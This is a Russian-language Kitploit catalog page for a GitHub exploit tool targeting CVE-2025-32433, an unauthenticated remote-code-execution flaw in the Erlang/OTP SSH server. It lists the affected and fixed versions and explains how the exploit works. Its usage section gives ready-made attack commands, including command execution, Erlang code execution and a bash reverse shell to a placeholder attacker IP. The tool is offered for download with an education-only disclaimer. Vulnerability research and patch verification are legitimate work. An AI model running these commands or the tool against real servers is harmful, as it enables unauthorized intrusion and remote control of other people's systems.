Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-32433-Exploit-edited — Based on the original version:https://github.com/vulhub/vulhub/blob/master/erlang/CVE-2025-32433/exploit.py Replace Unicode checkmark with ASCII character for Windows compatibility | Kitploit
Инструменты/GitHubGitHub/chuzoux/cve-2025-32433-exploit-edited
Vulnerability AnalysisExploitationPenetration TestingLearning & EducationRed TeamingRemote Access Tool
GitHubchuzoux/cve-2025-32433-exploit-edited

CVE-2025-32433-Exploit-edited

Based on the original version:https://github.com/vulhub/vulhub/blob/master/erlang/CVE-2025-32433/exploit.py Replace Unicode checkmark with ASCII character for Windows compatibility

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
2 месяцев назадЕщё не проверено

CVE-2025-32433 Эксплойт (совместим с Windows)

Удаленное выполнение кода без аутентификации в Erlang/OTP SSH

Описание

Этот репозиторий содержит эксплойт для CVE-2025-32433, критической уязвимости удаленного выполнения кода без аутентификации в SSH-сервере Erlang/OTP.

Ключевые особенности:

  • ✅ Эксплойт RCE без аутентификации
  • ✅ Исправлена совместимость с кодировкой GBK в Windows
  • ✅ Работает на версиях Erlang/OTP ≤ 27.3.2, ≤ 26.2.5.10, ≤ 25.3.2.19

Детали уязвимости

CVE ID: CVE-2025-32433
Серьезность: Критическая
Влияние: Удаленное выполнение кода без аутентификации

Уязвимость позволяет злоумышленникам выполнять произвольные системные команды на SSH-серверах Erlang/OTP без аутентификации, отправляя специально сформированные сообщения протокола SSH.

Затронутые версии

root@kitploit:~
OTP ≤ 27.3.2
OTP ≤ 26.2.5.10
OTP ≤ 25.3.2.19
OTP ≥ 17.0 и старше (вероятно)

Использование

root@kitploit:~
# Basic command execution
python exploit.py -t <target-ip> -p 2222 -c "whoami"

# Execute system command
python exploit.py -t 192.168.1.100 -p 2222 -c "touch /tmp/pwned"

# Raw Erlang code execution
python exploit.py -t 192.168.1.100 -p 2222 -e 'os:cmd("id").'

# Reverse shell
python exploit.py -t 192.168.1.100 -p 2222 -c "bash -i >& /dev/tcp/YOUR_IP/4444 0>&1"

Аргументы

root@kitploit:~
-t, --target    IP-адрес цели (по умолчанию: 127.0.0.1)
-p, --port      Порт цели (по умолчанию: 2222)
-c, --command   Системная команда для выполнения
-e, --erlang    Исходный код Erlang для выполнения

Исправление кодировки Windows

Эта версия исправляет проблему с кодировкой, присутствующую в оригинальном эксплойте:

Проблема: В оригинальном эксплойте использовался символ галочки Unicode (✓, U+2713), что вызывает ошибки кодировки GBK в Windows:

root@kitploit:~
'gbk' codec can't encode character '✓' in position 1: illegal multibyte sequence

Решение: Заменен символ Unicode на стандартный символ ASCII + для кроссплатформенной совместимости.

Технические детали

Эксплойт работает следующим образом:

  1. Установление SSH-соединения и обмен баннерами
  2. Отправка пакета SSH_MSG_KEXINIT
  3. Открытие SSH-канала с помощью SSH_MSG_CHANNEL_OPEN
  4. Отправка SSH_MSG_CHANNEL_REQUEST с вредоносной командой exec до аутентификации
  5. Выполнение произвольного кода Erlang через os:cmd()

Ссылки

  • Рекомендации по безопасности в GitHub
  • Фикс коммита Erlang/OTP
  • RFC 4254 — Протокол соединения SSH
  • ProDefense CVE-2025-32433

Исправленные версии

  • OTP 27.3.3
  • OTP 26.2.5.11
  • OTP 25.3.2.20

Отказ от ответственности

Данный эксплойт предоставляется только для образовательных целей и авторизованного тестирования безопасности. Несанкционированный доступ к компьютерным системам незаконен. Используйте ответственно и только на системах, на тестирование которых у вас есть явное разрешение.

Лицензия

Лицензия MIT

Автор

Модифицировано для совместимости с Windows пользователем chuzouX

Скачать инструмент